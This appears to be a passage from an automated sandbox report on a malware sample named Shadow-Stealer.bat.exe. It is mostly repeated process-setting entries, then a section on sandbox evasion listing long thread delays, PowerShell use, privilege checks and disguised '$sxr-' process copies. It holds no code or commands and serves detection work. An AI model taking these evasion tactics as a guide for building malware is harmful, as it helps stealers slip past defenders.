            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
            Source: c:\windows\$sxr-powershell.exeKey value queried: Powershell behaviorJump to behavior
            Source: c:\windows\$sxr-powershell.exeKey value queried: Powershell behavior
            Source: c:\users\user\desktop\shadow-stealer.bat.exeKey value queried: Powershell behaviorJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 6264Thread sleep count: 4668 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 6264Thread sleep count: 4876 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 5788Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\$sxr-powershell.exe TID: 5644Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\$sxr-powershell.exe TID: 4568Thread sleep count: 363 > 30
            Source: C:\Windows\$sxr-powershell.exe TID: 2988Thread sleep count: 97 > 30
            Source: C:\Windows\$sxr-powershell.exe TID: 3392Thread sleep count: 106 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924Thread sleep count: 3805 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924Thread sleep time: -3805000s >= -30000s
            Source: C:\Windows\System32\winlogon.exe TID: 6924Thread sleep count: 6191 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924Thread sleep time: -6191000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 3088Thread sleep count: 9969 > 30
            Source: C:\Windows\System32\lsass.exe TID: 3088Thread sleep time: -9969000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep count: 239 > 30
            Source: C:\Windows\System32\svchost.exe TID: 432Thread sleep time: -239000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 5352Thread sleep count: 8989 > 30
            Source: C:\Windows\System32\dwm.exe TID: 5352Thread sleep time: -8989000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 5352Thread sleep count: 871 > 30
            Source: C:\Windows\System32\dwm.exe TID: 5352Thread sleep time: -871000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 5368Thread sleep count: 108 > 30
            Source: C:\Windows\SysWOW64\cscript.exe TID: 5368Thread sleep time: -108000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2672Thread sleep count: 119 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2672Thread sleep time: -119000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 776Thread sleep count: 121 > 30
            Source: C:\Windows\System32\svchost.exe TID: 776Thread sleep time: -121000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2872Thread sleep count: 100 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2872Thread sleep time: -100000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 4092Thread sleep count: 101 > 30
            Source: C:\Windows\System32\svchost.exe TID: 4092Thread sleep time: -101000s >= -30000s
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 5840Thread sleep count: 104 > 30
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 5840Thread sleep time: -104000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 5064Thread sleep count: 56 > 30
            Source: C:\Windows\System32\svchost.exe TID: 5064Thread sleep time: -56000s >= -30000s
            Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe TID: 5336Thread sleep time: -92000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\$sxr-powershell.exeLast function: Thread delayed
            Source: C:\Windows\$sxr-powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeWindow / User API: threadDelayed 4668Jump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeWindow / User API: threadDelayed 4876Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 5359Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 2914Jump to behavior
            Source: C:\Windows\$sxr-powershell.exeWindow / User API: threadDelayed 363
            Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 3805
            Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 6191
            Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9969
            Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 8989
            Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 871
            Source: C:\Windows\SysWOW64\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_20-228
            Source: C:\Windows\$sxr-mshta.exeAPI coverage: 9.6 %
            Source: C:\Windows\$sxr-cmd.exeAPI coverage: 7.9 %
            Source: C:\Windows\$sxr-powershell.exeAPI coverage: 2.9 %
            Source: C:\Windows\System32\lsass.exeAPI coverage: 9.1 %
